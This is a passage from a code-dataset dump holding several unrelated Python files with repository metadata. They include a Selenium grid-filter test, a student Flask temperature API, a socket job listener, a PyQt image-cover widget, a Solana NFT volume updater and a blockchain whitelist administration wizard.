Selectors\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n\r\nclass Int_Filter(unittest.TestCase):\r\n    \r\n    def __init__(self, filterWord, column, myPyDriver, wait): \r\n        self.myPyDriver = myPyDriver\r\n        self.wait = wait\r\n        selector_object = Selectors.Selectors()\r\n        self.catalogFilterMenuXPath = selector_object.catalogFilterMenuXPath\r\n        self.filterClearButtonXPath = selector_object.filterClearButtonXPath\r\n        self.filterTextBar1XPath = selector_object.filterTextBar1XPath\r\n        self.catalogFilterButton = selector_object.catalogFilterButton\r\n        self.xyiconGridRow = selector_object.xyiconGridRow\r\n        self.filterSubmitButtonXPath = selector_object.filterSubmitButtonXPath\r\n        \r\n        _filter = filterWord\r\n        filterXpath = \"//th[\"+str(column)+\"]/a/span\"\r\n        for i in range(1,7): \r\n            time.sleep(1)\r\n            filterButton = self.myPyDriver.find_element_by_xpath(filterXpath)\r\n            time.sleep(1)\r\n            filterButton.click()\r\n            self.wait.until(EC.presence_of_all_elements_located((By.XPATH,self.filterTextBar1XPath))) \r\n            time.sleep(1) \r\n            self.wait.until(EC.element_to_be_clickable((By.XPATH,self.catalogFilterButton))).click()\r\n            time.sleep(1)\r\n            self.wait.until(EC.presence_of_all_elements_located((By.TAG_NAME,'li'))) \r\n            self.currentFilter = self.myPyDriver.find_element_by_xpath(self.catalogFilterMenuXPath+\"[\"+str(i)+\"]\")\r\n            self.currentFilter.click()\r\n            self.textBar = self.myPyDriver.find_element_by_xpath(self.filterTextBar1XPath)\r\n            self.textBar.clear()\r\n            time.sleep(1)\r\n            #self.textBar.click()\r\n            \r\n            count = 1\r\n            self.upButton = self.myPyDriver.find_element_by_xpath('//span[2]/span/span/span/span')\r\n            while count <= int(_filter):\r\n                self.upButton.click()\r\n                count = count + 1\r\n            self.myPyDriver.find_element_by_xpath(self.filterSubmitButtonXPath).click()  \r\n            \r\n            table = self.myPyDriver.find_elements_by_xpath(self.xyiconGridRow)\r\n            for tr in table:\r\n                tds = tr.find_elements_by_tag_name('td')\r\n                currentText = str(tds[(column-1)].text).lower()\r\n                if(i == 1):\r\n                    self.assertTrue(_filter == currentText)\r\n                if(i == 2):\r\n                    self.assertTrue(_filter != currentText)\r\n                if(i == 3):\r\n                    self.assertTrue(int(_filter) <= int(currentText))\r\n                if(i == 4):\r\n                    self.assertTrue(int(_filter) < int(currentText))\r\n                if(i == 5):\r\n                    self.assertTrue(int(_filter) >= int(currentText))\r\n                if(i == 6):\r\n                    self.assertTrue(int(_filter) > int(currentText))\r\n                time.sleep(1)\r\n        \r\n            self.myPyDriver.find_element_by_xpath(filterXpath).click()\r\n            time.sleep(1)\r\n            self.wait.until(EC.element_to_be_clickable((By.XPATH,self.filterClearButtonXPath))).click()\r\n\r\n\r\n", "repo_name": "arramabbott/PySrTest", "sub_path": "Int_Filter.py", "file_name": "Int_Filter.py", "file_ext": "py", "file_size_in_byte": 3317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Selectors.Selectors", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_all_elements_located", "line_number": 30, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 30, "usage_type": "name"}, {"api_name": 
"selenium.webdriver.common.by.By.XPATH", "line_number": 30, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 30, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 32, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 32, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_all_elements_located", "line_number": 34, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 69, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 69, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "17915955005", "text": "#Tejada, John Michael T. CPE41S2\n\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n# 1. Create a REST API using FLASK and insert a new temperature record to a JSON file. \n# The temperature information is composed of temp_id, date, and temperature. (2 points)\ntemperatures = [\n\n {\n \"temp_id\" : 0,\n \"date\" : \"09-28-2022\",\n \"temperature\" : \"32°C\"\n },\n\n {\n \"temp_id\" : 1,\n \"date\" : \"09-29-2022\",\n \"temperature\" : \"33°C\"\n }\n\n]\n\n# 2, Create a REST API using FLASK to read temperature information from a JSON file. \n# The temperature information is composed of temp_id, date, and temperature. (2 points)\n@app.route('/temperatures', methods=['GET'])\ndef displayTemp():\n\n return jsonify(temperatures)\n\n# 3. Create a REST API using FLASK to read the temperature information of a specific temperature id from a JSON file. \n# The temperature information is composed of temp_id, date, and temperature (2 points)\n@app.route('/temperatures/', methods=['GET'])\ndef displayById(indexd):\n\n return jsonify(temperatures[index])\n\n# 4. Create a REST API using FLASK to update a temperature record of a specific temperature_id. \n# The temperature information is composed of temp_id, date, and temperature (2 points)\n@app.route('/temperatures', methods=['POST'])\ndef addTemp():\n\n temperature = request.get_json()\n temperatures.append(temperature)\n return {'id': len(temperatures)},200\n\n\n# 5. Create a REST API using FLASK to delete a temperature record of a specific temperature_id. 
\n# 5. Create a REST API using FLASK to delete a temperature record of a specific temperature_id. \n# The temperature information is composed of temp_id, date, and temperature (2 points).\n@app.route('/temperatures/<int:index>', methods=['DELETE'])\ndef deleteTemp(index):\n    temperatures.pop(index)\n    return 'Temperature was successfully deleted', 200\n\nif __name__ == '__main__':\n\n    app.run()", "repo_name": "qjmttejada/temperaturefiles", "sub_path": "temperature.py", "file_name": "temperature.py", "file_ext": "py", "file_size_in_byte": 1862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "18508656159", "text": "import socket\nimport ensicoin\nimport json\nimport solidator\nimport database\nimport os\nimport shutil\n\nTCP_IP = \"0.0.0.0\"\nTCP_PORT = 2442\n\n\ndef listen():\n    listener = socket.socket()\n    listener.bind((TCP_IP, TCP_PORT))\n    listener.listen()\n\n    while True:\n        conn, _ = listener.accept()\n\n        print(\"connection accepted\")\n\n        data = conn.recv(66).decode()\n\n        print(\"data:\", data)\n\n        _, flags = ensicoin.wait_for_pubkey(data)\n\n        print(\"flags: \", flags)\n\n        segments = None\n        job_id = None\n\n        if flags[0][0] == \"[\":\n            segments = json.loads(flags[0])\n            job_id = flags[1]\n\n        if flags[1][0] == \"[\":\n            segments = json.loads(flags[1])\n            job_id = flags[0]\n\n        print(\"segments: \", segments)\n        print(\"job_id: \", job_id)\n\n        database.update_state(database.open_db(), 26, job_id)\n\n        print(\"saving results\")\n        \n        points = solidator.create_points(segments)\n        os.mkdir(job_id)\n        os.chdir(job_id)\n        solidator.remove_deg_1(points, job_id, True)\n\n        result = open(\"result.svg\", \"r\")\n        svg_data = result.read()\n        result.close()\n\n        os.chdir(\"..\")\n        shutil.rmtree(job_id)\n\n        database.open_db().write(\"/{}/result\".format(job_id), svg_data)\n        database.update_state(database.open_db(), 31, job_id)\n\nif __name__ == \"__main__\":\n    print('starting solidator')\n    listen()\n", "repo_name": "traxys/micro-tiling", "sub_path": "Solidator/ensicoin_waiter.py", "file_name": "ensicoin_waiter.py", "file_ext": "py", "file_size_in_byte": 1437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "socket.socket", "line_number": 14, "usage_type": "call"}, {"api_name": "ensicoin.wait_for_pubkey", "line_number": 27, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "database.update_state", "line_number": 45, "usage_type": "call"}, {"api_name": "database.open_db", "line_number": 45, "usage_type": "call"}, {"api_name": "solidator.create_points", "line_number": 49, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 51, "usage_type": "call"}, {"api_name": "solidator.remove_deg_1", "line_number": 52, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 58, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 59, "usage_type": "call"}, {"api_name": "database.open_db", "line_number": 61, "usage_type": "call"}, {"api_name": "database.update_state", "line_number": 62, 
"usage_type": "call"}, {"api_name": "database.open_db", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "2447225672", "text": "from typing import Callable, Optional, Union\n\nfrom PyQt5.QtCore import QEasingCurve, Qt, QVariantAnimation\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QLabel, QWidget\n\nfrom modules.helpers import Pixmaps\nfrom modules.helpers.types.Bytes import Bytes\n\n\nclass CoverProp:\n __created_covers: dict['CoverProp', QPixmap] = {}\n\n def __init__(self,\n data: bytes,\n width: int,\n height: int,\n radius: int,\n ):\n self.__data: bytes = data\n self.__pixmap: QPixmap | None = None\n self.__width: int = width\n self.__height: int = height\n self.__radius: int = radius\n\n def __eq__(self, o: 'CoverProp') -> bool:\n return (\n self.__data == o.__data and\n self.__width == o.__width and\n self.__height == o.__height and\n self.__radius == o.__radius\n )\n\n def __hash__(self) -> int:\n return hash((Bytes.decode(self.__data), self.__width, self.__height, self.__radius))\n\n def __set_pixmap(self, pixmap: QPixmap) -> None:\n self.__pixmap = pixmap\n\n def data(self) -> bytes:\n return self.__data\n\n def radius(self) -> int:\n return self.__radius\n\n def content(self) -> QPixmap:\n return self.__pixmap\n\n @staticmethod\n def from_bytes(\n image_byte: bytes,\n width: int = 0,\n height: int = 0,\n radius: int = 0,\n crop_center: bool = True,\n ) -> Union['CoverProp', None]:\n cover = CoverProp(image_byte, width, height, radius)\n if cover in CoverProp.__created_covers:\n pixmap = CoverProp.__created_covers[cover]\n cover.__set_pixmap(pixmap)\n return cover\n\n pixmap = Pixmaps.get_pixmap_from_bytes(image_byte)\n if pixmap.isNull():\n return None\n if width > 0 or height > 0:\n pixmap = Pixmaps.scale_pixmap_keeping_ratio(pixmap, max(width, height))\n pixmap = Pixmaps.crop_pixmap(pixmap, width, height, crop_center)\n if radius > 0:\n pixmap = Pixmaps.round_pixmap(pixmap, radius)\n\n cover.__set_pixmap(pixmap)\n CoverProp.__created_covers[cover] = pixmap\n return cover\n\n\nclass Cover(QLabel):\n __default_cover: CoverProp\n __current_cover: CoverProp\n __value: float = 0\n __start: float = 0\n __end: float = 0\n __radius: int = 0\n __animation: QVariantAnimation\n\n def __init__(self, parent: Optional[\"QWidget\"] = None):\n QLabel.__init__(self, parent)\n\n def set_default_cover(self, cover: CoverProp) -> None:\n self.__default_cover = cover\n self.set_cover(cover)\n\n def current_cover(self) -> CoverProp:\n return self.__current_cover\n\n def set_radius(self, radius: int) -> None:\n self.__radius = radius\n\n def set_cover(self, cover: CoverProp) -> None:\n if cover is None:\n cover = self.__default_cover\n\n self.__current_cover = cover\n self.set_radius(cover.radius())\n super().setPixmap(cover.content())\n\n def set_animation(self, duration: float, start: float, end: float, on_value_changed: Callable) -> None:\n self.__start = start\n self.__end = end\n self.__animation = QVariantAnimation(self, valueChanged=on_value_changed, duration=duration)\n self.__animation.setEasingCurve(QEasingCurve.OutCubic)\n\n def zoom(self, value: float) -> None:\n self.__value = value\n if self.__current_cover is None:\n return\n pixmap = self.__current_cover.content().copy()\n pixmap = pixmap.scaledToHeight(int(self.height() * value), Qt.SmoothTransformation)\n pixmap = Pixmaps.crop_pixmap(pixmap, self.width(), self.height())\n pixmap = Pixmaps.round_pixmap(pixmap, radius=self.__radius)\n self.__set_hover_pixmap(pixmap)\n\n def animation_on_entered_hover(self) -> 
None:\n if self.__animation is None:\n return\n self.__animation.stop()\n self.__animation.setStartValue(self.__start)\n self.__animation.setEndValue(self.__end)\n self.__animation.start()\n\n def animation_on_left_hover(self) -> None:\n if self.__animation is None:\n return\n self.__animation.setStartValue(self.__value)\n self.__animation.setEndValue(self.__start)\n self.__animation.start()\n\n def __set_hover_pixmap(self, pixmap: QPixmap) -> None:\n super().setPixmap(pixmap)\n", "repo_name": "Ananta0810/Meelody", "sub_path": "modules/widgets/Cover.py", "file_name": "Cover.py", "file_ext": "py", "file_size_in_byte": 4482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PyQt5.QtGui.QPixmap", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 21, "usage_type": "name"}, {"api_name": "modules.helpers.types.Bytes.Bytes.decode", "line_number": 35, "usage_type": "call"}, {"api_name": "modules.helpers.types.Bytes.Bytes", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 46, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.get_pixmap_from_bytes", "line_number": 63, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.scale_pixmap_keeping_ratio", "line_number": 67, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.crop_pixmap", "line_number": 68, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 68, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.round_pixmap", "line_number": 70, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 56, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QVariantAnimation", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 86, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel.__init__", "line_number": 87, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 107, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QVariantAnimation", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QEasingCurve.OutCubic", "line_number": 111, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.QEasingCurve", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.SmoothTransformation", "line_number": 118, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 118, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.crop_pixmap", "line_number": 119, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 119, "usage_type": "name"}, {"api_name": "modules.helpers.Pixmaps.round_pixmap", "line_number": 120, "usage_type": "call"}, {"api_name": "modules.helpers.Pixmaps", "line_number": 120, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 138, "usage_type": "name"}]} +{"seq_id": "38905871856", "text": "import json\nimport os\nimport time\nimport requests\n\nnow = 
int(time.time())\n\nAPI_KEY = \"\"\nwl = json.load(open(\"whitelist.json\"))\n\nfrom collections import namedtuple\nResponse = namedtuple('Response', ['status_code'])\n\ncounter_it = 0\nfor i in wl:\n\n    url = \"https://beta.api.solanalysis.com/rest/get-project-stat-hist\"\n    if not i['hyperspaceSlug']:\n        print(i['name'])\n        continue\n\n    payload = json.dumps({\n        \"conditions\": {\n            \"project_ids\": [\n                i['hyperspaceSlug']\n            ],\n            \"start_timestamp\": now - 86400*7,\n            \"end_timestamp\": now,\n            \"time_granularity\": \"PER_DAY\"\n        },\n        \"pagination_info\": {\n            \"page_number\": 1,\n            \"page_size\": 10\n        }\n    })\n    headers = {\n        'Authorization': API_KEY,\n        'Content-Type': 'application/json'\n    }\n    response = Response(500)\n    counter = 0\n    while response.status_code != 200:\n        response = requests.request(\"POST\", url, headers=headers, data=payload)\n        time.sleep(5)\n        counter += 1\n        if counter > 30:\n            print(i['hyperspaceSlug'])\n            print(i['name'])\n            break\n    if response.status_code != 200:\n        print(response)\n        print(i['hyperspaceSlug'])\n        continue\n    volume = 0\n    for j in response.json()['project_stat_hist_entries']:\n        volume += j['volume']\n    i['volume7d'] = volume\n    if i['tier'] == 1:\n        i['volume_with_tiers'] = i['volume7d'] * 1.25\n    elif i['tier'] == 2:\n        i['volume_with_tiers'] = i['volume7d'] * 0.7\n    else:\n        i['volume_with_tiers'] = i['volume7d'] * 0.3\n    if counter_it % 10 == 0:\n        print(counter_it)\n    counter_it += 1\n\nwith open(\"whitelist.json\", \"w\") as file:\n    json.dump(wl, file, indent = 1)\n", "repo_name": "frakt-solana/nft_lending_protocol_whitelist", "sub_path": "update_volume.py", "file_name": "update_volume.py", "file_ext": "py", "file_size_in_byte": 1601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 6, "usage_type": "call"}, {"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 43, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "27090436730", "text": "import getpass\nimport json\nimport os\nimport sys\nimport time\n\nfrom web3 import Web3, IPCProvider\n\nglobals()['masterchain_dir_path'] = '~/masterchain/masterchain_data/'\nglobals()['meth_ipc_path'] = str(\"~/masterchain/masterchain_data/meth.ipc\")\nw3 = Web3()\n\n\ndef welcome_message():\n    print(\"WELCOME TO WHITELIST MANAGEMENT WIZARD\\n\")\n    update_provider_addr('ipc')\n\n\ndef update_provider_addr(provider_type):\n    if provider_type == 'ipc':\n        print(\"IPC provider selected. Default provider location: \" + globals()['meth_ipc_path'])\n        addr = str(input(\"Please provide full path to IPC or press Enter to use default: \"))\n        if addr == \"\":\n            print(\"Using default addr \" + globals()['meth_ipc_path'])\n        else:\n            print(\"Using new addr \" + addr)\n            globals()['meth_ipc_path'] = addr\n\n\ndef init_vars():\n    global w3\n    w3 = Web3(IPCProvider(globals()['meth_ipc_path']))\n
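\n\n# Editor's note: a minimal sketch, not part of the original script - a small helper to\n# verify that the IPC endpoint answers before querying; isConnected() exists on the old\n# camelCase web3.py API that this script already uses (w3.eth.blockNumber, w3.personal):\ndef check_connection():\n    return w3.isConnected()\n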
\" + str(is_mining))\n\n if not is_mining:\n print(\"*Enabling mining...\")\n w3.miner.start(1)\n print(\"*Waiting for new block...\")\n while w3.eth.blockNumber == last_block:\n print('*', end='')\n time.sleep(10)\n\n if w3.eth.blockNumber > last_block:\n print(\"\\nChecks are ok.\\n\")\n\n\ndef read_config_files():\n if (not os.path.isfile(\"../templates/whitelist_abi.json\")) | (not os.path.isfile(\"out/masterchain-config.json\")):\n print(\"Unable to read abi & config files\")\n sys.exit(-1)\n\n globals()['json_abi'] = json.load(open(\"../templates/whitelist_abi.json\", \"r\"))\n masterchain_config = json.load(open(\"out/masterchain-config.json\", \"r\"))\n globals()['whitelist'] = masterchain_config['whitelist']\n globals()['admin'] = masterchain_config['admin']\n globals()['authority'] = masterchain_config['authority']\n globals()['signBlockAddress'] = masterchain_config['signBlockAddress']\n globals()['serverAddress'] = masterchain_config['serverAddress']\n globals()['clientAddress'] = masterchain_config['clientAddress']\n\n\ndef test_whitelist():\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n try:\n print(\"Whitelist signBlockAddress: \" + whitelist.functions.rootNode().call())\n print(\"Whitelist authority: \" + whitelist.functions.authority().call())\n except FileNotFoundError:\n print(\"{} file not available. Check your node is running.\".format(globals()['meth_ipc_path']))\n sys.exit(-1)\n\n\ndef is_node_activated():\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n return not whitelist.functions.rootNodeAllowed().call()\n\n\ndef user_dialog():\n print(\"\\nAvailable actions: \")\n print(\"1. Add admin\")\n print(\"2. Register rootnode addresses\")\n print(\"3. Register node server/client addresses\")\n print(\"4. Register node signer address\")\n print(\"5. Ban node server/client address\")\n print(\"6. Ban node signer address\")\n print(\"8. Check node activated\")\n print(\"9. Exit\")\n user_choice = input(\"Please choose the action: \")\n if user_choice == '1':\n add_admin_transaction()\n elif user_choice == '2':\n register_root_addresses()\n elif user_choice == '3':\n register_reader_node_addresses()\n elif user_choice == '4':\n register_signer_node_addresses()\n elif user_choice == '5':\n ban_reader_node_addresses()\n elif user_choice == '6':\n ban_signer_node_addresses()\n # elif user_choice == '3':\n # send_signed_transactions()\n elif user_choice == '8':\n print(\"Node address activated? {}\".format(is_node_activated()))\n return user_dialog()\n elif user_choice == '9':\n sys.exit(0)\n else:\n return user_dialog()\n\n\ndef enter_address_dialog(address_type):\n address = input(\"Please input the \" + str(address_type) + \" address with 0x prefix: \")\n if len(address) != 42:\n print(\"Wrong length.\")\n return enter_address_dialog(address_type)\n elif address[0:2] != \"0x\":\n print(\"Bad prefix.\")\n return enter_address_dialog(address_type)\n return address\n\n\ndef enter_mask_dialog():\n mask = int(input(\"Enter address mask: 1 (read), 2 (mine) or 3 (read/mine): \"))\n if mask != 1 | mask != 2 | mask != 3:\n print(\"Bad mask entered. 
You can only use 1, 2 or 3.\")\n return enter_mask_dialog()\n return mask\n\n\ndef unlock_account(account, account_type):\n pwd = getpass.getpass(\"Enter {} {} account password: \".format(account, account_type))\n try:\n w3.personal.unlockAccount(Web3.toChecksumAddress(account), pwd, 30)\n except ValueError as ex:\n print(\"Error: {}\".format(ex))\n return False\n else:\n return True\n\n\ndef add_admin_transaction():\n if is_node_activated():\n print(\"Whitelist activated. You are free to add any account as admin. \"\n \"Wizard will ask you new admin address and reference below.\\n\")\n admin_address = enter_address_dialog(\"admin\")\n admin_reference = input(\"Enter new admin reference. It can be any string: \")\n else:\n print(\"Whitelist is not activated. You only can add admin that set in masterchain-config.json\")\n admin_address = globals()['admin']\n admin_reference = \"firstAdmin\"\n\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n authority_account = whitelist.functions.authority().call()\n new_gas_price = w3.eth.gasPrice + 100\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(authority_account))\n\n add_admin_data = whitelist.encodeABI(fn_name='addAdmin',\n args=[Web3.toChecksumAddress(admin_address), admin_reference])\n add_admin = {'data': add_admin_data, 'from': Web3.toChecksumAddress(authority_account),\n 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'gas': 4700000, 'gasPrice': new_gas_price, 'nonce': nonce}\n admin_check = w3.eth.call(add_admin)\n\n if not admin_check:\n print(\"Test call returned False. Unable to add admin {}, {}\".format(admin_address, admin_reference))\n return user_dialog()\n # unlock authority\n unlock_result = unlock_account(authority_account, \"AUTHORITY\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n admin_transact = w3.eth.sendTransaction(add_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(admin_transact, 300)['status']))\n user_dialog()\n\n\ndef ban_reader_node_addresses():\n activated = is_node_activated()\n if activated:\n print(\"Whitelist is activated. You are changing mask for node server/client addresses. \\n\"\n \"Wizard will ask you new mask and node server and client addresses.\\n\"\n \"You will be asked about admin account.\\n\")\n\n new_mask = 0\n node_server_address = enter_address_dialog(\"node server\")\n node_client_address = enter_address_dialog(\"node client\")\n current_admin = enter_address_dialog(\"admin\")\n\n # unlock admin\n unlock_result = unlock_account(current_admin, \"ADMIN\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n stat1 = change_mask_transaction(node_server_address, new_mask, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat1, 300)['status']))\n stat2 = change_mask_transaction(node_client_address, new_mask, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(stat2, 300)['status']))\n else:\n print(\"Whitelist is not activated. Select action 2 (Register rootnode addresses).\")\n\n user_dialog()\n\n\ndef ban_signer_node_addresses():\n activated = is_node_activated()\n if activated:\n print(\"Whitelist is activated. 
You are changing mask for signing node address.\\n\"\n              \"Wizard will ask you new mask and node signer address.\\n\"\n              \"You will be asked about admin account.\\n\")\n\n        new_mask = 0\n        node_sign_address = enter_address_dialog(\"node signer\")\n        current_admin = enter_address_dialog(\"admin\")\n\n        # unlock admin\n        unlock_result = unlock_account(current_admin, \"ADMIN\")\n        if not unlock_result:\n            print(\"Unable to unlock account. Returning.\")\n            return user_dialog()\n\n        stat1 = change_mask_transaction(node_sign_address, new_mask, current_admin)\n        print(\"Transaction execution status: {}\".format(get_transaction_status(stat1, 300)['status']))\n    else:\n        print(\"Whitelist is not activated. Select action 2 (Register rootnode addresses).\")\n\n    user_dialog()\n\n\ndef register_reader_node_addresses():\n    activated = is_node_activated()\n    if activated:\n        print(\"Whitelist is activated. You are adding node server/client addresses. \\n\"\n              \"Wizard will ask you new node server and client addresses and reference below.\\n\"\n              \"You will be asked about admin account.\\n\")\n\n        node_server_address = enter_address_dialog(\"node server\")\n        node_client_address = enter_address_dialog(\"node client\")\n        node_reference = input(\"Enter new node reference. It can be any string: \")\n        node_read_mask = 1\n\n        current_admin = enter_address_dialog(\"admin\")\n        # unlock admin\n        unlock_result = unlock_account(current_admin, \"ADMIN\")\n        if not unlock_result:\n            print(\"Unable to unlock account. Returning.\")\n            return user_dialog()\n\n        stat1 = register_transaction(node_server_address, node_read_mask, node_reference, current_admin)\n        print(\"Transaction execution status: {}\".format(get_transaction_status(stat1, 300)['status']))\n        stat2 = register_transaction(node_client_address, node_read_mask, node_reference, current_admin)\n        print(\"Transaction execution status: {}\".format(get_transaction_status(stat2, 300)['status']))\n    else:\n        print(\"Whitelist is not activated. Select action 2 (Register rootnode addresses).\")\n\n    user_dialog()\n\n\ndef register_signer_node_addresses():\n    activated = is_node_activated()\n    if activated:\n        print(\"Whitelist is activated. 
Rootnode addresses:\\n\"\n \"signBlockAddress, serverAddress and clientAddress from masterchain-config.json will be added\")\n\n sign_address = globals()['signBlockAddress']\n server_address = globals()['serverAddress']\n client_address = globals()['clientAddress']\n sign_mask = 2\n read_mask = 1\n reference = \"Root node\"\n\n current_admin = globals()['admin']\n # unlock admin\n unlock_result = unlock_account(current_admin, \"ADMIN\")\n if not unlock_result:\n print(\"Unable to unlock account. Returning.\")\n return user_dialog()\n\n status = register_full_transaction(sign_address, server_address, client_address,\n sign_mask, read_mask, reference, current_admin)\n print(\"Transaction execution status: {}\".format(get_transaction_status(status, 300)['status']))\n\n user_dialog()\n\n\ndef change_mask_transaction(new_node_address, new_node_mask, current_admin):\n whitelist = w3.eth.contract(abi=globals()['json_abi'], address=Web3.toChecksumAddress(globals()['whitelist']))\n\n admin_account_privileged = whitelist.functions.isAdmin(Web3.toChecksumAddress(current_admin)).call()\n if not admin_account_privileged:\n print(\"Account {} is not admin of whitelist. Returning.\".format(current_admin))\n return user_dialog()\n\n block_node_data = whitelist.encodeABI(fn_name='setMask',\n args=[Web3.toChecksumAddress(new_node_address), new_node_mask])\n new_gas_price = w3.eth.gasPrice + 1000\n nonce = w3.eth.getTransactionCount(Web3.toChecksumAddress(current_admin))\n register_node = {'data': block_node_data, 'to': Web3.toChecksumAddress(globals()['whitelist']),\n 'from': Web3.toChecksumAddress(current_admin), 'gas': 4700000, 'gasPrice': new_gas_price,\n 'nonce': nonce}\n register_node_check = w3.eth.call(register_node)\n if not register_node_check:\n print(\"Test call returned False. Unable to block node {}\".format(new_node_address))\n return user_dialog()\n\n # send transaction\n print(\"Sending transaction...\")\n register_transact = w3.eth.sendTransaction(register_node)\n return register_transact\n\n\ndef register_transaction(new_node_address, new_node_mask, new_node_reference, current_admin):\n whitelist = w3.eth.contract(abi=globals()['json_abi'], 